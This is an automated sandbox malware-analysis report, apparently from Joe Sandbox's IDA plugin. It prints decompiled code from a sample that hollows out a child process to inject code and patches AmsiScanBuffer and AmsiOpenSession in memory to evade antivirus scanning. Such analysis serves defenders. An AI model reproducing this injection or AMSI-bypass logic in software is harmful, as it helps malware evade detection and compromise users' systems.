0x0286b74d
0x0286b758
0x0286b766
0x0286b77e
0x0286b789
0x0286b78a
0x0286b78f
0x0286b794
0x0286b796
0x0286b7a6
0x0286b7be
0x0286b7c9
0x0286b7d7
0x0286b7ef
0x0286b7fa
0x0286b7fb
0x0286b800
0x0286b805
0x0286b807
0x0286b817
0x0286b82f
0x0286b83a
0x0286b848
0x0286b860
0x0286b86b
0x0286b86c
0x0286b871
0x0286b876
0x0286b878
0x0286b888
0x0286b8a0
0x0286b8ab
0x0286b8b9
0x0286b8d1
0x0286b8dc
0x0286b8dd
0x0286b8e4
0x0286b8ea
0x0286b8f9
0x0286b904
0x0286b909
0x0286b90b
0x0286b91b
0x0286b933
0x0286b93e
0x0286b94c
0x0286b964
0x0286b96f
0x0286b970
0x0286b975
0x0286b97a
0x0286b97c
0x0286b98c
0x0286b9a4
0x0286b9af
0x0286b9bd
0x0286b9d5
0x0286b9e0
0x0286b9e1
0x0286b9f0
0x0286b9f5
0x0286ba04
0x0286ba09
0x0286ba18
0x0286ba1d
0x0286ba1d
0x0286ace7
0x00000000

APIs

Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,028A640C,028A63FC,ScanString,028A63D4,0286BA90,Initialize,028A63D4), ref: 0286A195
NtCreateProcess.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,001F0FFF,028A6324,00000000,00000001,00000000,00000000,00000000,OpenSession,028A63D4,0286BA90,ScanString,028A63D4,0286BA90,UacInitialize,028A63D4), ref: 0286A474
GetThreadContext.KERNEL32(000008BC,028A6450,OpenSession,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,000008B8,001F0FFF,028A6324,00000000,00000001), ref: 0286A5E1
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,0031BFF8,028A6524,00000004,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,000008BC,028A6450,OpenSession,028A63D4,0286BA90), ref: 0286A6EB
NtUnmapViewOfSection.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,OpenSession,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,000008B8,0031BFF8,028A6524,00000004,028A652C), ref: 0286A866

Part of subcall function 028679CC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
Part of subcall function 028679CC: GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
Part of subcall function 028679CC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,00000000,00081000,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4,0286BA90,ScanString,028A63D4), ref: 0286B0FF
NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,00400000,00081000,000008B8,00400000,00000000,00081000,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4), ref: 0286B119
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008B8,0031BFF8,028A6528,00000004,028A652C,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4,0286BA90,ScanString,028A63D4), ref: 0286B36E
SetThreadContext.KERNEL32(000008BC,028A6450,OpenSession,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,OpenSession,028A63D4), ref: 0286B6A8
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008BC,00000000,OpenSession,028A63D4,0286BA90,ScanBuffer,028A63D4,0286BA90,UacInitialize,028A63D4,0286BA90,ScanString,028A63D4,0286BA90,UacInitialize,028A63D4), ref: 0286B8EA

Part of subcall function 02867B24: LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
Part of subcall function 02867B24: GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
Part of subcall function 02867B24: WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
Part of subcall function 02867B24: FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F

Strings

Initialize, xrefs: 02869E1F, 02869E78, 0286A082
NtOpenProcess, xrefs: 0286B9E6
UacScan, xrefs: 0286A023
ntdll, xrefs: 0286B9EB, 0286B9FF, 0286BA13
NtSetSecurityObject, xrefs: 0286BA0E
NtReadVirtualMemory, xrefs: 0286B9FA
ScanBuffer, xrefs: 02869DC6, 02869F2C, 0286A1A5, 0286A480, 0286A666, 0286A70B, 0286A8A1, 0286AA18, 0286AB94, 0286AD11, 0286B07A, 0286B2E9, 0286B53E, 0286B5C2, 0286B807, 0286B90B
OpenSession, xrefs: 02869D6D, 0286A287, 0286A3EF, 0286A562, 0286A7ED, 0286A983, 0286AAFA, 0286AC76, 0286ADF3, 0286AF98, 0286B207, 0286B45C, 0286B633, 0286B878, 0286B97C
ScanString, xrefs: 02869ED1, 0286A0F3, 0286A37E, 0286AF27, 0286B196, 0286B3EB, 0286B725
UacInitialize, xrefs: 02869FCA, 0286A216, 0286A30D, 0286A4F1, 0286A5F5, 0286A77C, 0286A912, 0286AA89, 0286AC05, 0286AD82, 0286AEB6, 0286B009, 0286B125, 0286B278, 0286B37A, 0286B4CD, 0286B6B4, 0286B796

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: MemoryVirtual$Process$LibraryWrite$AddressProcThread$ContextCreateCurrentFreeHandleLoadModule$AllocateCacheFlushInstructionProtectReadResumeSectionUnmapUserView
String ID: Initialize$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$ntdll
API String ID: 3077615847-3811953699
Opcode ID: 579f232d8670217a7c16867b5ba8d6309b06c6190183eddfbf5260425c0f0363
Instruction ID: 3b7eee43f592f5287eb675d4cf2f41c9b95b302df390a288aa83308aa40eb68c
Opcode Fuzzy Hash: 579f232d8670217a7c16867b5ba8d6309b06c6190183eddfbf5260425c0f0363
Instruction Fuzzy Hash: 62F2403CA112698BEB21EB68CC84BDE73FAAF45705F1041A1D509FB314DE70AE859F52

Uniqueness

Uniqueness Score: -1.00%

Function 02855A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E02855A90(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x2855b95);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E028558CC( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02855CFC, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E02855B9C);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								L12:
								if( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
									goto L12;
								}
								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}

0x02855a91
0x02855a93
0x02855a9b
0x02855aac
0x02855ab1
0x02855aca
0x02855ad1
0x02855b13
0x02855b15
0x02855b16
0x02855b1b
0x02855b1e
0x02855b21
0x02855b33
0x02855b56
0x02855b76
0x02855b76
0x02855b7a
0x02855b80
0x02855b83
0x02855b86
0x02855b94
0x02855ad3
0x02855ae8
0x02855aef
0x00000000
0x02855af1
0x02855b06
0x02855b0d
0x02855bac
0x02855bbf
0x02855bc4
0x02855bcd
0x02855bf7
0x02855bfc
0x02855bff
0x02855bfb
0x00000000
0x02855bfb
0x02855c0b
0x02855c13
0x02855c19
0x02855c1e
0x02855c31
0x02855c46
0x02855c46
0x02855c4a
0x02855c69
0x02855c7e
0x02855c82
0x02855c84
0x02855c9f
0x02855cb4
0x02855cb4
0x02855c82
0x02855c4a
0x02855c13
0x02855cbd
0x00000000
0x00000000
0x00000000
0x02855b0d
0x02855aef

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,02877790), ref: 02855AAC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855ACA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,02877790), ref: 02855AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855B06
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B4F
RegQueryValueExA.ADVAPI32(?,02855CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B95,?,80000001), ref: 02855B6D
RegCloseKey.ADVAPI32(?,02855B9C,00000000,?,?,00000000,02855B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B8F
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855CAF

Strings

Software\Borland\Delphi\Locales, xrefs: 02855AFC
Software\Borland\Locales, xrefs: 02855AC0, 02855ADE

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: de06f682054973327dc659ca6601d61cdacbaf5ca8aae8da8bdfffa5b62e8093
Instruction ID: 35f63b4aa711d24b0549b09d7adf915a8af08425f4f4387a42bde156b4d52669
Opcode Fuzzy Hash: de06f682054973327dc659ca6601d61cdacbaf5ca8aae8da8bdfffa5b62e8093
Instruction Fuzzy Hash: 41517C7DA4026C7EFB25D6A4CC49FEF77BD9B04744F8001A1AE08E6181E7789E448F66

Uniqueness

Uniqueness Score: -1.00%

Function 0286C194 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 191
processnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E0286C194(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				intOrPtr _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				WCHAR* _t111;
				WCHAR* _t119;
				void* _t120;
				void* _t156;
				intOrPtr _t158;
				void* _t167;
				void* _t170;
				void* _t178;
				void* _t181;
				void* _t189;
				void* _t192;
				intOrPtr _t193;
				void* _t200;
				intOrPtr _t202;
				intOrPtr _t203;

				_t202 = _t203;
				_t158 = 0x34;
				do {
					_push(0);
					_push(0);
					_t158 = _t158 - 1;
					_t204 = _t158;
				} while (_t158 != 0);
				_push(_t158);
				_t1 =  &_v8;
				 *_t1 = _t158;
				_t200 = __edx;
				_t156 = __eax;
				_push(_t202);
				_push(0x286c492);
				_push( *[fs:eax]);
				 *[fs:eax] = _t203;
				E02854698( &_v352, "AmsiOpenSession");
				_push(_v352);
				E02854698( &_v356, "Amsi");
				_pop(_t167); // executed
				E02867B80(_v356, _t167); // executed
				E02854698( &_v360, "AmsiScanBuffer");
				_push(_v360);
				E02854698( &_v364, "Amsi");
				_pop(_t170); // executed
				E02867B80(_v364, _t170); // executed
				_push(0x286c4d4);
				E02854704( &_v372, _t156, _t204);
				_push(_v372);
				_push(0x286c4e0);
				E02854704( &_v376, _t200, _t204);
				_push(_v376);
				E02854824();
				E0285473C( &_v348, 0xff, _v368);
				E02853098( &_v76, 0x44);
				_v76.cb = 0x44;
				_v76.dwFlags = 1;
				_v76.wShowWindow =  *_t1;
				E02854698( &_v380, "AmsiScanBuffer");
				_push(_v380);
				E02854698( &_v384, "Amsi");
				_pop(_t178); // executed
				E02867B80(_v384, _t178); // executed
				E02854698( &_v388, "AmsiOpenSession");
				_push(_v388);
				E02854698( &_v392, "Amsi");
				_pop(_t181); // executed
				E02867B80(_v392, _t181); // executed
				E02854704( &_v404, _t156, _t204);
				E02857F10(_v404,  &_v400);
				E02854D38( &_v396, E02854964(_v400));
				_t111 = E02854DB4(_v396);
				E02854704( &_v412,  &_v348, _t204);
				E02854D38( &_v408, E02854964(_v412));
				_t119 = E02854DB4(_v408);
				_t120 =  *0x28a6540; // 0x0
				CreateProcessAsUserW(_t120, 0, _t119, 0, 0, 0, 0x30, 0, _t111,  &_v76,  &_v92); // executed
				NtCreateProcess(_v92.hProcess, 0x1f0fff, 0x28a662c, 0, 1, 0, 0, 0);
				E02854698( &_v416, "AmsiOpenSession");
				_push(_v416);
				E02854698( &_v420, "Amsi");
				_pop(_t189); // executed
				E02867B80(_v420, _t189); // executed
				E02854698( &_v424, "AmsiScanBuffer");
				_push(_v424);
				E02854698( &_v428, "Amsi");
				_pop(_t192); // executed
				E02867B80(_v428, _t192); // executed
				if(_v5 != 0) {
					WaitForSingleObject(_v92.hProcess, 0xffffffff);
					CloseHandle(_v92);
					CloseHandle(_v92.hThread);
				}
				_pop(_t193);
				 *[fs:eax] = _t193;
				_push(0x286c499);
				E028544C4( &_v428, 5);
				E02854C24( &_v408);
				E028544C4( &_v404, 2);
				E02854C24( &_v396);
				return E028544C4( &_v392, 0xb);
			}

0x0286c195
0x0286c198
0x0286c19d
0x0286c19d
0x0286c19f
0x0286c1a1
0x0286c1a1
0x0286c1a1
0x0286c1a4
0x0286c1a5
0x0286c1a5
0x0286c1ad
0x0286c1af
0x0286c1b3
0x0286c1b4
0x0286c1b9
0x0286c1bc
0x0286c1ca
0x0286c1d5
0x0286c1e1
0x0286c1ec
0x0286c1ed
0x0286c1fd
0x0286c208
0x0286c214
0x0286c21f
0x0286c220
0x0286c225
0x0286c232
0x0286c237
0x0286c23d
0x0286c24a
0x0286c24f
0x0286c260
0x0286c276
0x0286c285
0x0286c28a
0x0286c291
0x0286c298
0x0286c2a7
0x0286c2b2
0x0286c2be
0x0286c2c9
0x0286c2ca
0x0286c2da
0x0286c2e5
0x0286c2f1
0x0286c2fc
0x0286c2fd
0x0286c312
0x0286c323
0x0286c33b
0x0286c346
0x0286c362
0x0286c37a
0x0286c385
0x0286c38d
0x0286c393
0x0286c3b0
0x0286c3c0
0x0286c3cb
0x0286c3d7
0x0286c3e2
0x0286c3e3
0x0286c3f3
0x0286c3fe
0x0286c40a
0x0286c415
0x0286c416
0x0286c41f
0x0286c427
0x0286c430
0x0286c439
0x0286c439
0x0286c440
0x0286c443
0x0286c446
0x0286c456
0x0286c461
0x0286c471
0x0286c47c
0x0286c491

APIs

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?,?,?,?,?,?), ref: 0286C393
NtCreateProcess.C:\WINDOWS\SYSTEM32\NTDLL(?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000), ref: 0286C3B0

Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B

WaitForSingleObject.KERNEL32(?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C427
CloseHandle.KERNEL32(?,?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C430
CloseHandle.KERNEL32(?,?,?,000000FF,?,001F0FFF,028A662C,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0286C439

Strings

Amsi, xrefs: 0286C1DC, 0286C20F, 0286C2B9, 0286C2EC, 0286C3D2, 0286C405
AmsiScanBuffer, xrefs: 0286C1F8, 0286C2A2, 0286C3EE
AmsiOpenSession, xrefs: 0286C1C5, 0286C2D5, 0286C3BB
D, xrefs: 0286C28A

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Process$Handle$CloseCreateCurrentLibraryVirtual$AddressFreeLoadMemoryModuleObjectProcProtectSingleUserWaitWrite
String ID: Amsi$AmsiOpenSession$AmsiScanBuffer$D
API String ID: 941487604-87056827
Opcode ID: ddfb394105fcdf1989058f577401bc69e3111f1286a97fc8414a5e37ad4eaf34
Instruction ID: 9ce122e3241ccf0f6ba16b226ac7d52c7a03807eb1ee7dd66662350eb92a23c3
Opcode Fuzzy Hash: ddfb394105fcdf1989058f577401bc69e3111f1286a97fc8414a5e37ad4eaf34
Instruction Fuzzy Hash: 5A71353DA001289FEB20EB64CC44BEEB7BBEF45310F5084D2E548E7645DA74AE858F51

Uniqueness

Uniqueness Score: -1.00%

Function 02867B80 Relevance: 12.1, APIs: 8, Instructions: 64
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E02867B80(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v12;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				intOrPtr _t41;
				void* _t45;

				_v12 = __edx;
				_v8 = __eax;
				E02854954(_v8);
				E02854954(_v12);
				_push(_t45);
				_push(0x2867c5b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				LoadLibraryExA(E02854964(_v8), 0, 0); // executed
				 *0x28a6344 = GetModuleHandleA(E02854964(_v8));
				_t22 = E02854964(_v12);
				_t23 =  *0x28a6344; // 0x6cfe0000
				 *0x28a6348 = GetProcAddress(_t23, _t22);
				VirtualProtectEx(GetCurrentProcess(), 0x28a6348, 0x190, 0x40, 0x28a634c);
				E02852DE0(0x2856738, 4, 0x28a6348);
				NtWriteVirtualMemory(GetCurrentProcess(), 0x28a6348, 0x2856738, 4, 0x28a634c);
				_t31 =  *0x28a6344; // 0x6cfe0000
				FreeLibrary(_t31); // executed
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(0x2867c62);
				return E028544C4( &_v12, 2);
			}

0x02867b86
0x02867b89
0x02867b8f
0x02867b97
0x02867b9e
0x02867b9f
0x02867ba4
0x02867ba7
0x02867bb8
0x02867bcb
0x02867bd3
0x02867bd9
0x02867be4
0x02867c00
0x02867c14
0x02867c30
0x02867c35
0x02867c3b
0x02867c42
0x02867c45
0x02867c48
0x02867c5a

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: CurrentLibraryProcessVirtual$AddressFreeHandleLoadMemoryModuleProcProtectWrite
String ID:
API String ID: 2990312385-0
Opcode ID: a98739c33bf528ff45d01850f56d621c4fdeee5ae33a80db820af1a050815b1a
Instruction ID: e909dae3c1f96a79fa66a417622c665c3f36f44655cbc6f8ddd7a7d93205336c
Opcode Fuzzy Hash: a98739c33bf528ff45d01850f56d621c4fdeee5ae33a80db820af1a050815b1a
Instruction Fuzzy Hash: D01184BCA80334AAFB00FFAC8C56B5EB7EDEF44701F9404207A25E7294EE7499018A15

